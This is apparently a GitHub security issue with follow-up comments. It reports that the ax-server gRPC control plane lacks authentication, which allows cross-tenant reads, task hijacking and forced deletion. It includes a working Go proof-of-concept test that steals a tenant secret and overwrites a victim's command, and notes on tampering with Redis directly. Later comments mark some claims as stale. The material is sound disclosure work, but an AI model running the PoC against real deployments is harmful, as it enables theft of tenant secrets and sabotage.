Skip to content

Security: ax-server control plane has no authentication or authorization (cross-tenant read, task hijack, forced teardown) #376

Description

@Aravindargutus

Reported to the Google OSS VRP, which triaged it as a valid critical product vulnerability and invited a public issue on this repository to get it fixed.

Reviewed at commit d8ed0fe (main).

Summary

ax-server exposes every gRPC method with no authentication and no authorization. The tenant identifier (atespace) is an attacker-supplied request field, and an empty value returns the global index of all objects. Any client that can reach the server can therefore read, modify, and request deletion of every tenant's Tasks, Workspaces, Gateways, and Models a complete break of the multi-tenant isolation AX is designed to enforce.

In the default deployment this is reachable from inside every task sandbox, so a single malicious or prompt-injected agent can pivot to compromise all other tenants.

Root cause

The gRPC server is constructed with no transport credentials and no interceptor:

// internal/server/server.go:38-46
func NewServer(s store.Store) *Server {
    srv := &Server{
        store:      s,
        grpcServer: grpc.NewServer(), // no creds, no auth/authz interceptor
    }
    v1alpha1.RegisterAXServer(srv.grpcServer, srv)
    return srv
}

It is served as cleartext h2c (cmd/ax-server/main.go sets SetUnencryptedHTTP2(true) and listens on :8080), so there is no
channel-level client authentication either.

No handler derives a caller identity; each trusts req.Atespace verbatim
(internal/server/server.go:73 GetTask, :91 ListTasks, :111
UpdateTask, :132 DeleteTask, and the Workspace/Gateway/Model handlers):

atespace := req.Atespace
if atespace == "" {
    atespace = "default"
}

And an empty atespace returns the global index across all tenants:

// internal/store/redis/store.go:219
if atespace == "" || atespace == "*" {
    members, err = s.client.ZRevRange(ctx, s.taskIndexKey(), start, stop).Result()
}

Impact

  • Confidentiality. ListTasks{atespace:""} (or a targeted GetTask)
    returns other tenants' task specs, including secrets in Task.spec.env. The
    controller also injects the resolved model API key and the full Task/Workspace
    YAML into the container environment
    (internal/controller/reconciler.go:152-164), and List*/Get* do no field
    stripping.
  • Integrity. UpdateTask performs no ownership check, so a victim task's
    spec.command / spec.image can be overwritten and spec.debug set to true;
    on the next reconcile the attacker's command runs inside the victim's sandbox
    with the victim's environment and secrets.
  • Availability. DeleteTask on any victim task marks it Terminating and
    emits a delete event (two-phase delete, internal/server/server.go:132),
    after which the controller tears down the actor.

Reachability

A task with no Gateway is given an allow-all egress policy:

// internal/controller/reconciler.go:193-198
egressAllowlist = &v1alpha1.EgressAllowlist{
    Hosts: []*v1alpha1.HostRule{{Host: "*", Port: 443}},
}

and internal/substrate/client.go:459-475 converts host "*" into
EgressRule{All} — the Port field is never read anywhere in the codebase — so
sandboxes can reach the in-cluster ax-server:8080. Redis also has no password
(deploy/redis.yaml, empty --redis-password), so the same state is reachable
directly on :6379 via SET ax:task:<ns>:<name> + XADD ax:stream:tasks.

Reproduction

The test below drives the real internal/server handlers against the in-memory
store using two independent unauthenticated gRPC connections: a victim that
provisions a task and disconnects, and a separate attacker sharing no state with
it. No Redis, Kubernetes, or Substrate required.

Save as internal/server/ax_noauth_poc_test.go and run:

go test -run TestPoC_NoAuthCrossTenant -v ./internal/server/
PoC test source
package server_test

import (
	"context"
	"net"
	"net/http"
	"testing"
	"time"

	"github.com/google/ax/internal/server"
	"github.com/google/ax/internal/store/memory"
	v1 "github.com/google/ax/pkg/apis/v1alpha1"

	"google.golang.org/grpc"
	"google.golang.org/grpc/credentials/insecure"
)

func pocServe(t *testing.T) (string, func()) {
	srv := server.NewServer(memory.NewStore())
	ln, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		t.Fatal(err)
	}
	hs := &http.Server{Handler: srv.Handler()}
	hs.Protocols = new(http.Protocols)
	hs.Protocols.SetHTTP1(true)
	hs.Protocols.SetUnencryptedHTTP2(true)
	go hs.Serve(ln)
	time.Sleep(100 * time.Millisecond)
	return ln.Addr().String(), func() { hs.Close() }
}

func pocDial(t *testing.T, addr string) (v1.AXClient, func()) {
	conn, err := grpc.NewClient(addr, grpc.WithTransportCredentials(insecure.NewCredentials()))
	if err != nil {
		t.Fatal(err)
	}
	return v1.NewAXClient(conn), func() { conn.Close() }
}

func TestPoC_NoAuthCrossTenant(t *testing.T) {
	addr, stopServer := pocServe(t)
	defer stopServer()
	ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
	defer cancel()

	// VICTIM: provisions a task holding a secret, then disconnects.
	victim, closeVictim := pocDial(t, addr)
	defer closeVictim()
	if _, err := victim.UpdateTask(ctx, &v1.UpdateTaskRequest{Task: &v1.Task{
		Metadata: &v1.ObjectMeta{Name: "billing-job", Atespace: "victim-tenant"},
		Spec: &v1.TaskSpec{
			Image:   "victim/app:1.0",
			Command: []string{"/run-billing"},
			Env:     []*v1.EnvVar{{Name: "STRIPE_KEY", Value: "sk_live_SECRET"}},
		},
	}}); err != nil {
		t.Fatalf("victim setup: %v", err)
	}
	closeVictim()

	// ATTACKER: separate connection, no credentials, no shared state.
	attacker, closeAttacker := pocDial(t, addr)
	defer closeAttacker()

	// (a) Cross-tenant read via the global index.
	all, err := attacker.ListTasks(ctx, &v1.ListTasksRequest{Atespace: ""})
	if err != nil {
		t.Fatalf("attacker ListTasks: %v", err)
	}
	leaked := false
	for _, tk := range all.Tasks {
		for _, e := range tk.GetSpec().GetEnv() {
			if e.Value == "sk_live_SECRET" {
				leaked = true
				t.Logf("[a] attacker READ %s=%s from tenant %q (it never owned)",
					e.Name, e.Value, tk.GetMetadata().GetAtespace())
			}
		}
	}
	if !leaked {
		t.Fatal("expected attacker to read victim secret via empty-atespace list")
	}

	// (a') Targeted cross-tenant read.
	stolen, err := attacker.GetTask(ctx, &v1.GetTaskRequest{Name: "billing-job", Atespace: "victim-tenant"})
	if err != nil {
		t.Fatalf("attacker GetTask on victim atespace: %v", err)
	}
	t.Logf("[a'] attacker GetTask victim-tenant/billing-job -> env=%v", stolen.GetSpec().GetEnv())

	// (b) Hijack the victim's task.
	if _, err := attacker.UpdateTask(ctx, &v1.UpdateTaskRequest{Task: &v1.Task{
		Metadata: &v1.ObjectMeta{Name: "billing-job", Atespace: "victim-tenant"},
		Spec: &v1.TaskSpec{
			Image:   "victim/app:1.0",
			Command: []string{"sh", "-c", "echo attacker-controlled"},
			Debug:   true,
		},
	}}); err != nil {
		t.Fatalf("attacker UpdateTask: %v", err)
	}
	got, _ := attacker.GetTask(ctx, &v1.GetTaskRequest{Name: "billing-job", Atespace: "victim-tenant"})
	t.Logf("[b] attacker HIJACKED command=%v debug=%v",
		got.GetSpec().GetCommand(), got.GetSpec().GetDebug())

	// (c) Force teardown (two-phase delete).
	if _, err := attacker.DeleteTask(ctx, &v1.DeleteTaskRequest{
		Name: "billing-job", Atespace: "victim-tenant",
	}); err != nil {
		t.Fatalf("attacker DeleteTask: %v", err)
	}
	after, err := attacker.GetTask(ctx, &v1.GetTaskRequest{Name: "billing-job", Atespace: "victim-tenant"})
	if err != nil {
		t.Fatalf("GetTask after delete: %v", err)
	}
	if after.GetStatus().GetPhase() != v1.PhaseTerminating {
		t.Fatalf("expected phase Terminating, got %q", after.GetStatus().GetPhase())
	}
	t.Logf("[c] attacker forced victim task -> phase=%q", after.GetStatus().GetPhase())
}

Output:

[a]  attacker READ STRIPE_KEY=sk_live_SECRET from tenant "victim-tenant" (it never owned)
[a'] attacker GetTask victim-tenant/billing-job -> env=[STRIPE_KEY=sk_live_SECRET]
[b]  attacker HIJACKED command=[sh -c echo attacker-controlled] debug=true
[c]  attacker forced victim task -> phase="Terminating"
--- PASS

Scope of what the PoC demonstrates

Executed and confirmed: the API-layer cross-tenant read, hijack-write,
and delete-request (→ Terminating). Verified deterministic across repeated
runs (-count=5).

Verified by code path but not executed here (they need the controller +
Substrate + Kubernetes runtime): the hijacked command actually executing inside
the victim's sandbox, the final record teardown after the two-phase delete, and
the default-egress reachability from a sandbox.

Suggested fixes

  1. Require authenticated RPCs (mTLS or a validated bearer token) via a gRPC
    interceptor, and serve TLS rather than cleartext h2c.
  2. Bind the authenticated identity to the atespaces it may access; reject a
    caller-supplied atespace outside that set, and drop the empty/* → global
    behavior for untrusted callers.
  3. Strip spec.env values (and the injected key/YAML) from objects returned by
    List*/Get*.
  4. Set a Redis password and add NetworkPolicies so only ax-server /
    ax-controller can reach Redis.
  5. Default the no-Gateway egress policy to deny cluster-internal CIDRs so
    sandboxes cannot reach the control plane or Redis.

Related findings from the same review

Happy to open separate issues for these if useful:

  • Cross-namespace Kubernetes secret read via metadata.atespace combined with a
    cluster-wide secrets ClusterRole, with the controller's own key as a
    fallback for any atespace (internal/controller/reconciler.go:371-385,
    deploy/ax-controller.yaml).
  • Unauthenticated guest process-exec / filesystem service on :80 when
    spec.debug is set, reachable via atenet-router
    (internal/metadata/server.go:71-87).
  • Egress fence weaker than documented: HostRule.Port is never read, and an
    empty allowlist applies no policy while the task still reports
    GatewayReady=True (internal/substrate/client.go:451-475).
  • Workspace path escape via GitRepo.dir — absolute paths and .. are not
    rejected (internal/workspace/setup.go:173-183).
  • git argument injection: branch/URL are passed to git fetch without a --
    separator (internal/workspace/setup.go:217-227).

Activity

  1. bolubo commented on Sep 27, 2026

    @bolubo

    Status update: what still reproduces on main today (d0bc38b)

    Thanks for the write-up. I re-ran the key parts against a local kind cluster with Substrate + AX installed, and they hold up.

    Still reproducible

    • Cross-tenant read. The read handlers take atespace := req.Atespace verbatim (internal/server/server.go:77, 152, 171, 196, 221, 263, 289), and ListTasks starts from atespace := "" (:92), which is the global index. Live: ax get task <name> -a victim-tenant returned the victim's spec.env; ax get tasks -a '' listed another tenant's task.
    • Cross-tenant delete. ax delete task <name> -a victim-tenant removed the object.
    • Workspace write (not in the report). UpdateWorkspace (:289) has no ownership check; ax apply against a Workspace in another tenant's atespace answered "configured" and rewrote its files. Model still exposes Update too (pkg/apis/v1alpha1/ax.proto:42-49).

    Changed since the report

    • Task mutation is gone. The service no longer exposes UpdateTask, and CreateTask rejects an existing task (internal/server/server.go:129; live: "already exists and is immutable"). So the hijack path as reported is closed, and the integrity risk now sits on Workspace and Model.

    Not verified, and why

    • Sandbox reachability to ax-server:8080: my tasks never reached an actor. I could not get past gVisor's runsc start (exit 128) in this nested kind/WSL environment, so that claim stays untested on my side.
    • Separately, two deployment notes that may deserve their own issue: a controller that starts before Redis is ready never (re)creates its consumer group, so tasks stay Suspended until it is restarted; and the task image must be digest-pinned for the controller's custom ActorTemplate to be accepted.

    One design question
    No code proposed here, since #419 rewrites several of these files. The in-cluster half of the fix already exists: the controller authenticates to Substrate with a projected service account token plus a trust bundle (deploy/ax-controller.yaml; internal/substrate/client.go), and Substrate mints per-actor identities (MintActorJWT, MintActorCertificate → spiffe://${trustdomain}/actor/${atespace}/${actor}). The half I cannot answer from outside is the human caller: ax apply reaches the server through a kubeconfig port-forward (internal/tunnel/tunnel.go:181) and then speaks plain HTTP with no credential. Is the intent to keep relying on Kubernetes RBAC for that path, to have the CLI present a Kubernetes-issued token, or something else?

    (Part of this write-up was drafted with AI assistance; every claim was checked against the code and a live cluster.)

  2. Aravindargutus commented on Sep 28, 2026

    @Aravindargutus
    Author

    Thanks for re-running this against a live cluster — that's more verification than the report itself had, and the UpdateTask correction is right. I re-checked on upstream/main, which has since moved to ac23328 ("Replace Redis Streams queue and controller with direct execution and resource locking"), and confirm your findings independently:

    UpdateTask is gone. It's absent from both pkg/apis/v1alpha1/ax.proto (the Task block now exposes only Get/List/Create/Delete/Suspend/Resume/Watch) and internal/server/server.go. CreateTask takes the lock, then GetTask → FailedPrecondition "task %s/%s already exists and is immutable" (server.go:138-165). So the task-hijack path as reported is closed — the PoC's step [b] no longer applies to main. Worth correcting in the report; I'd rather the record be accurate than dramatic.

    Your Workspace finding reproduces in the code too, and it's the right place to put the integrity risk now. UpdateWorkspace (server.go:442) validates, defaults metadata, takes atespace straight from req.Workspace.Metadata.Atespace, locks, and SaveWorkspaces — no ownership check anywhere. Same shape for UpdateModel (:528), and DeleteWorkspace/DeleteModel are equally unguarded. Since a Workspace drives git.repo/branch/dir for whoever binds it, rewriting another tenant's Workspace is a code-delivery primitive into their sandbox — arguably a cleaner path than the old UpdateTask one.

    What still stands unchanged on ac23328:

    • NewServer is still grpc.NewServer() — no transport credentials, no interceptor (server.go, in the Options-taking constructor).
    • cmd/ax-server/main.go:119 still SetUnencryptedHTTP2(true).
    • ListTasks still starts atespace := "" (server.go:118-120) → global index.
    • deploy/redis.yaml still runs redis:7-alpine with no requirepass, and --redis-password still defaults to "". The Streams queue went away; Redis as the store did not.

    On the reachability leg you couldn't test — fair, and I should be equally clear that I never executed it either; the report marks it code-path-only. The code path is reconciler.go:193-198 (no Gateway → {Host:"*", Port:443}) → substrate/client.go:459-475, where host == "*" becomes EgressRule{All}. HostRule.Port is read nowhere in the repo (grep returns no hits), so the 443 is decorative and the rule is all-ports. That's the argument on paper; neither of us has run it end to end, and it'd be good if someone with a working actor could settle it.


    On the design question — I can only answer as a reporter, not for the project, but having now read both sides of the boundary:

    Kubernetes RBAC on the port-forward path can't be the whole answer, because it doesn't cover the path that matters most. ax apply reaching the server via kubectl port-forward (internal/tunnel/tunnel.go:181) does sit behind pods/portforward RBAC. But an actor or any other pod reaching ax-server:8080 in-cluster never touches the API server, so no RBAC decision is ever made for it. That in-cluster path is precisely the one the original report is about, and it stays open no matter how tightly the CLI path is gated. RBAC-only would secure the door while leaving the wall missing.

    Two further limits: pods/portforward is namespace-coarse and carries no tenant identity, so even on the CLI path the server can't tell which tenant is calling and therefore can't enforce per-atespace authorization; and it grants raw TCP to anything in that namespace, Redis included.

    So the shape that seems to follow is two callers, two mechanisms, one authorization model:

    • Workloads/in-cluster: mTLS with the SPIFFE identity Substrate already mints (spiffe://${trustdomain}/actor/${atespace}/${actor}) — the atespace is right there in the SVID path, so it binds the caller to its tenant with no extra plumbing.
    • Humans/CLI: a Kubernetes-issued token (projected SA token, or the user's own credential) validated server-side via TokenReview, with the atespace bound to the validated identity rather than taken from the request.
    • Either way the invariant is the same: atespace becomes an output of authentication, not an input from the request body, and the empty/* → global case stops being reachable for an untrusted caller.

    That also mirrors what Substrate already does on its own API (mTLS creds + interceptors + the OpenFGA model in cmd/ateapi/internal/authz/model.fga), so AX would be adopting the model underneath it rather than inventing one. Happy to defer entirely to whatever the maintainers intend — mostly I wanted to flag that the RBAC-only option leaves the sandbox→control-plane path unaddressed.

    Since #419 rewrites these files, I won't propose code here. Glad to open separate issues for the Workspace/Model write path, or for the two deployment notes you mentioned, if that's useful.

  3. bolubo commented on Sep 28, 2026

    @bolubo

    Follow-up: the sandbox → ax-server question, settled with a working actor

    Thanks for re-running all of that yourself — I agree with the deltas, and your read on the Workspace path is the sharper one. You also said it'd be good if someone with a working actor could settle the reachability question, so I spent some time getting one running. Here's what came out of it.

    Short version: by default a sandbox cannot touch ax-server at all; give the actor an egress grant and it can — and the network layer knows exactly who it is, while the control plane doesn't.

    A few details, since the middle part is where the interesting bit is:

    • With no EgressPolicy there is no path. The worker logs atunnel: egress gateway rejected CONNECT with 403 Forbidden: egress denied, and the app-side read fails with connection reset. (The connect itself "succeeds" first because egress is redirected into atunnel — the denial shows up on the first read, not at connect.)
    • With a policy in place, GET http://<ax-server ClusterIP>:8080/ comes back with the server's own 404 page not found. I get the same from an actor created by an AX task, not just a Substrate-created one. I also checked the host side as a control: that endpoint answers HTTP/1.1 and h2 prior-knowledge through a port-forward, so the 404 is the server's normal response rather than a transport artefact.
    • Per-destination rules already work: a policy of rules: [ - cidrs: {cidrs: ["10.96.89.38/32"]} ] lets ax-server through and denies rustfs, the k8s API and the internet. So a grant can be written to exclude the control plane.

    For contrast, a plain cluster pod doesn't need any grant: it gets 404 from ax-server, 403 forbidden: User "system:anonymous" from the k8s API, and 403 AccessDenied from rustfs. Every neighbour rejects the anonymous caller; ax-server has nothing that would.

    How I'd read the severity, for what it's worth: what protects this today is the default of no egress, not an authorization decision inside ax-server. As far as I can tell nothing in the repo creates a policy (a grep for EgressPolicy across the tree comes back empty; the roadmap lists it as a goal). That default will change as soon as tasks need model or external APIs — and unless the grant is written to exclude the control plane, it is on the path.

    One design thought, which I'd rather bring to #433 than grow here: the identity half already exists on the wire. The egress gateway logs every request as peer_san=spiffe://substrate-actor.local/ateom-for-actor/<atespace>/<actor>, with the CONNECT authority, and ax-server receives none of it. So "atespace as an output of authentication" looks less like something to invent and more like something to consume.

    Caveats: one cluster, one host (WSL2 + kind, micro-VM sandbox class). For the AX-task run I used a local controller build that reads the sandbox class from an env var — lab-only, no upstream change; upstream ac23328 still hardcodes the gVisor class, and I'm not proposing code.

    If you'd like, I can carry the measurements into #433 instead of expanding this thread — and I still have the two deployment reproductions if you'd like them as an issue.

    (Part of this write-up was drafted with AI assistance; every claim was checked against the code and a live cluster.)

  4. hsinhoyeh commented on Sep 28, 2026

    @hsinhoyeh

    Design input from a different project that hit the same problem, not a live-tested fix for this codebase — happy to be told any of this doesn't map.

    We maintain Containarium (https://github.com/footprintai/containarium), a self-hosted multi-tenant agent sandbox runtime that runs on both bare LXC and sigs.k8s.io/agent-sandbox on Kubernetes. Multi-tenant isolation on a shared control plane is our whole product, so the design direction this thread has converged on — atespace as an output of authentication, not an input from the request — is exactly the invariant we enforce, and I can confirm the shape works in production, not just in theory:

    • Every RPC is scope-gated by a JWT validated before dispatch, at the handler layer, with no path that trusts a caller-supplied tenant field. (internal/auth in our repo — backend-neutral, ~101 call sites.)
    • For the in-cluster/workload leg specifically, on our K8s backend we compile per-tenant egress policy directly into a native NetworkPolicy at reconcile time — the same primitive @bolubo's mTLS/SPIFFE proposal would sit next to. One thing that cost us a real incident to learn: a default-deny NetworkPolicy written once at object-create is not the same guarantee as one that's live-reconciled against current policy state. It reads as equivalent until a tenant's policy changes and the K8s object doesn't move with it. Given @bolubo's note that no EgressPolicy is created anywhere in AX today and the roadmap treats it as a future goal, it's worth deciding now whether that object is static-at-create or reconciled — retrofitting reconciliation later is more invasive than building it in from the start.
    • Tenant secrets are materialized per-tenant with audit-on-read rather than stamped into shared config, for the same reason spec.env leaking across atespaces is the sharpest part of this report.

    On the human/CLI leg: we landed on the same split — Kubernetes-issued token, validated server-side, tenant bound to the validated identity rather than read from the request — for the same reason @Aravindargutus gave: RBAC on the port-forward is namespace-coarse and carries no tenant identity, so it can gate the door but can't make a per-atespace decision.

    Not claiming symmetry — our own audit trail is complete at the API layer but not yet for in-box sessions on the K8s path, and that's disclosed in our own docs, not hidden. But the "identity as output of auth, not input from the body" invariant is the load-bearing one, and it's cheap to adopt now before more of the Task/Workspace/Model surface (per #433) gets built on top of the current trust-everything default.

    If it's useful, happy to send a small PR for the mechanical items in the original report — Redis requirepass + a NetworkPolicy restricting who can reach ax-server/Redis (#4/#5 in the original list) — those don't require deep AX context. I'd leave the mTLS/SPIFFE + TokenReview design to whoever owns #419/#433, since that's a bigger architectural call than an outside contributor should drive.

  5. Aravindargutus commented on Sep 28, 2026

    @Aravindargutus
    Author

    @bolubo That settles it, and it corrects my report — thank you for actually standing up an actor to get the answer. The "reachable from inside every task sandbox by default" line in my write-up is wrong for main, and should not be read as current.

    I went back to find why we disagreed, and the code archaeology matches your measurements exactly:

    d8ed0fe (what I reviewed) main (ac23328)
    egress refs in internal/controller/reconciler.go 8 0
    egress refs in internal/substrate/client.go 19 0
    ApplyEgressPolicy present removed
    Gateway RPCs in ax.proto present removed

    At d8ed0fe the reconciler really did synthesise an allow-all default for a task with no Gateway ({Host:"*", Port:443} → EgressRule{All}), which is where my claim came from. The controller rewrite took the whole egress path out with it — so your grep comes back empty because there is genuinely nothing left to find, and with no policy the default is Substrate's deny. Your 403 egress denied at the atunnel CONNECT is the correct and expected behaviour on main. My claim was accurate for the commit I read and stale by the time you tested it; that's on me for not re-checking against HEAD before filing.

    Your reading of the severity is the right one, and I'd go slightly further. What protects this today is a default, not a decision — and it's a default the product is built to outgrow. reconciler.go:153-154 still injects GEMINI_API_KEY into every task container. A task whose entire purpose is to run an agent against Gemini cannot function without egress to a model endpoint. So the grant isn't hypothetical future work; it's on the critical path for the primary use case, and the moment it lands, whether the control plane is on the path is decided by how someone writes a CIDR list. Your cidrs: ["10.96.89.38/32"] result is the encouraging half of that: the mechanism to exclude the control plane already works, so this is a matter of getting the default right the first time rather than inventing anything.

    The neighbour comparison is the sharpest framing anyone has put on this thread and I'd suggest it goes in whatever issue carries this forward: the k8s API answers system:anonymous with 403, rustfs answers 403 AccessDenied, and ax-server answers 404 — not because it checked anything, but because it has nothing to check with. A 404 there is the tell. Every neighbour has an opinion about an unauthenticated caller; ax-server has none.

    On identity being on the wire — agreed, and your peer_san=spiffe://substrate-actor.local/ateom-for-actor/<atespace>/<actor> observation is the concrete version of what I was gesturing at. The gateway is already authenticating the caller and already knows its atespace; ax-server just never receives it. That does make "atespace as an output of authentication" a consumption problem rather than a design problem, at least for the in-cluster caller. The human/CLI half is still the open one.

    Yes please, on both counts: carry the measurements into #433 — that's the better home for the design discussion, and this thread has served its purpose — and please do open the two deployment reproductions as their own issue. The controller-before-Redis consumer-group one in particular sounds like it would cost someone an afternoon of confusion.

    I'll leave the Workspace/Model write path (server.go:442, :528, plus the unguarded Deletes) here as the live item unless you'd rather it moved too, since it's a concrete missing-check rather than a design question.

    One process note: given that two of my original claims have now shifted under a moving main (the UpdateTask hijack path, and now the egress default), I'd rather the issue carry the corrections visibly than have someone find the original text later and act on it. Happy to edit the top post to mark both as superseded, with pointers to your findings — say the word if you'd prefer it done differently.

  6. Aravindargutus commented on Sep 28, 2026

    @Aravindargutus
    Author

    @hsinhoyeh Thanks — the reconciliation point is the part I hadn't considered, and it's the one I'd want on the record regardless of what AX ends up choosing.

    To restate it in AX's terms so it isn't lost: a policy object written once at create time and a policy object reconciled against current state look identical right up until the tenant's policy changes and the object doesn't move with it. That failure is silent — the object still exists, still says the right thing at the top, and no longer reflects intent. AX is in an unusually good position to take that for free right now, because (as @bolubo established) there is no policy object at all today: ApplyEgressPolicy and the whole Gateway surface came out in the ac23328 controller rewrite, so whatever gets built for #433 is greenfield rather than a retrofit. Deciding static-vs-reconciled while the answer is still "neither" is a lot cheaper than deciding it afterwards.

    Two caveats on how far I'd carry the analogy, since I'd rather under-claim:

    • I can't independently verify the production experience behind this, and AX's egress story isn't a NetworkPolicy story today — Substrate enforces it through atunnel/the egress gateway with SPIFFE identities on the wire (that's where @bolubo's peer_san=spiffe://…/<atespace>/<actor> comes from). So "compile per-tenant policy into a native NetworkPolicy" doesn't map one-to-one; the invariant (reconciled against live policy state, not frozen at create) is what transfers, not the mechanism.
    • I'm the reporter here, not a maintainer — I can't greenlight a PR or commit anyone to a direction. The mechanical items you're offering (Redis requirepass, plus a NetworkPolicy restricting who can reach ax-server and Redis) do still apply to current main: deploy/redis.yaml runs redis:7-alpine with no requirepass, --redis-password still defaults to "" (cmd/ax-server/main.go:52), and no NetworkPolicy ships anywhere in deploy/. But whether a PR is wanted, and from whom, is entirely for the AX maintainers to say — worth asking on Replace Redis Streams queue and controller #419/Revisit the API server and Task lifecycle #433 before spending the time.

    Agreed on leaving the mTLS/SPIFFE + TokenReview design to whoever owns those issues. And agreed on the ordering argument: the identity invariant is cheapest to adopt before more of the Task/Workspace/Model surface is built on the current default, which is exactly why I'd rather see it settled in #433 than accumulate more per-RPC checks later.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

      Milestone

      No milestone

      Relationships

      None yet

      Development

      No branches or pull requests

      Issue actions